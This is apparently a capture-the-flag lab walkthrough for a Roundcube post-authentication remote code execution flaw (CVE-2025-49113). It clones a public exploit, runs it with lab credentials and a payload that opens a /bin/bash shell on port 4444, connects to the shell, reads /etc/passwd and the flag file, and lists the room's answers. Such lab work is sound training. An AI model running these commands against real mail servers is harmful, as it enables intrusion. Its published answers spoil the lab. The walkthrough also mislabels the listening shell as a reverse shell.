Friendly Access here!

Room: https://tryhackme.com/room/roundcubecve202549113

This time, we're diving into a post-auth Remote Code Execution vulnerability in Roundcube — CVE-2025–49113. This one's clean, simple, and gets you root access with just a few moves.

Step 1: Clone the Exploit

First things first — grab the PoC from GitHub.

git clone https://github.com/fearsoff-org/CVE-2025-49113
cd CVE-2025-49113/

Step 2: Identify Valid Credentials

Once you explore the Roundcube login page on the target, you'll need valid credentials. The room gave us:

Username: ellieptic  
Password: ChangeMe123

Step 3: Fire the Exploit

Launch the RCE using the exploit:

php CVE-2025-49113.php http://10.10.82.9/roundcube ellieptic ChangeMe123 "ncat -lvnp 4444 -e /bin/bash"

Then Start your listener:

nc 10.10.82.9 4444

Done. Reverse shell in. You're now sitting inside:

/var/www/html/roundcube

Step 4: Enumerate the System

Do the usual. Check users, check permissions, and see what's what:

cat /etc/passwd

Found multiple users, but we're already www-data or better. We're good.

Step 5: Find the Flag

Navigate to /etc/ and there it is:

cat /etc/flag.txt

Output:

THM{ICE_CUBE_DESERIALISATION}
"After three rounds of coffee, I deserialised the object."

Flags

One of the users has the first name of Maggie; what is her last name?

Byte

What is the value of the flag saved in /etc?

THM{ICE_CUBE_DESERIALISATION}